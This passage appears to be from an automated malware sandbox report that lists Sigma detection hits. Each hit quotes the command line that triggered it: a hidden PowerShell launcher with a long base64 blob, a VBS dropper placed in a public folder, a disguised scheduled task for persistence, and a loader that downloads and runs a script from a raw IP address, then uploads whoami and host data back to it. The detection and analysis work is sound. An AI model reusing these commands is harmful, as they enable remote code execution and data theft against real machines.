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
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ProcessId: 7272, ProcessName: wscript.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6496, TargetFilename: C:\Users\Public\Libraries\Recorded.vbs
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6496, TargetFilename: C:\Users\Public\Libraries\Recorded.vbs
              Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}, ProcessId: 7332, ProcessName: powershell.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='JVBERi0xLjQKJeLjz9MNCjEgMCBvYmoKPDwgCi9DcmVhdG9yIChDYW5vbiBpUi1BRFYgNjU1NSAgUERGKQovQ3JlYXRpb25EYXRlIChEOjIwMjMwMjEzMDg1OTU3KzAxJzAwJykKL1Byb2R1Y2VyIChcMzc2XDM3N1wwMDBBXDAwMGRcMDAwb1wwMDBiXDAwMGVcMDAwIFwwMDBQXDAwMFNcMDAwTFwwMDAgXDAwMDFcMDAwLlwwMDBcCjNcMDAwZVwwMDAgXDAwMGZcMDAwb1wwMDByXDAwMCBcMDAwQ1wwMDBhXDAwMG5cMDAwb1wwMDBuXDAwMFwwMDApCj4+IAplbmRvYmoKMiAwIG9iago8PCAKL1BhZ2VzIDMgMCBSIAovVHlwZSAvQ2F0YWxvZyAKL091dHB1dEludGVudHMgMTIgMCBSIAovTWV0YWRhdGEgMTMgMCBSIAo+PiAKZW5kb2JqCjQgMCBvYmoKPDwgL1R5cGUgL1hPYmplY3QgL1N1YnR5cGUgL0ltYWdlIC9XaWR0aCAxMjQwIC9IZWlnaHQgMTc1MyAvQml0c1BlckNvbXBvbmVudCA4IAovQ29sb3JTcGFjZSAvRGV2aWNlR3JheSAvRmlsdGVyIFsgL0ZsYXRlRGVjb2RlIC9EQ1REZWNvZGUgXSAvTGVuZ3RoIDIxODgxID4+IApzdHJlYW0NCngB3D13QFPX17HaaqmWWpO2ahVbpRAQqcpoUUkdiAGBJgGpqKRuEREXKkhIq3XFgYYAAiIatgqpGsQBpA5EUUSGoqCgIiAgIoRhyOA7970sQrTaX/vP1z7Dy7vrrHvuOeeed9N9v/sx4TOnmdSZhD4f9CFEwP+EbgXBcPrC1f6rR1FXLybAf90VhOmEfsOHjxo+asyoUWNszMeY28ybZGMzad6GP+ZNm/fHhviDv7PZvx+MLzqVG517quh+bmdn7v3KhhcNlYrubkV1d3VDwxPodTr09b9d3X8RPhnw0YN+9/v0GYzg7EcgdF8lGBEIfT7sg/2n6r7PB337ffhR/wEfG3wCFTI+I3zQp2/fD/r1/fDDftCmD6vPB30J/QZ/+Pk346d+NIS2sP+3a4kTfj94bMDoaacukehFr8ZMXLRu68cGX3z51dBhxt+ZmJLNrKxtbH/40W76DIeZjrOoTgx3jzmev8z1Wrxk6bLlK3xWrt8QsHHT5sCgbX9s37Fz124ON4wXHhF5KCqaH5+QmJScknr89BlhxtnMc+cvXL5yNfda3vUb+cUlpXfvld1/UP7kafWzmtq65/UNLa3itvaOzteSLqBXuQqb/28NUJo6VE2Hbip8NUQocMSKTwOZlsVpbsPUVCpQ9eQTcjVOXMyUNqWqoCpVDUfDGiJSLwtVEtpKWfYgUTVmklxNMVWXVdVqekQztRueBD5rwWipolq0vRKGFFWvIAT+9xdrGC3SIqoShAo6a8ffUNdF1V2ypups6UA2hq/oWmzHV2riW96HmArOTIVV1Z/JmDxYsbarpMFooZqrJTlqmVoBnVVhEp6gvkuUElUDhL0Y301AkwET6j/z1BLqU6WNzw5K802YV5mvSxTqnn3iNDXKPulY23Hwy6hxhZabqqasX9CM6IZaqOj2ogQx8R5T+qJYvptdh8gMbGHXCas6gVGfARlL2FXLwl5MV2xxgYGiN93Pk3XEwLStOmWJ33QTYMopH4VKmmzlHT6iRUbiSn/okrWLXRgoao537gBsptTCZIK5sRNvh8p8RM1nXKVAyiP4KIuVo/j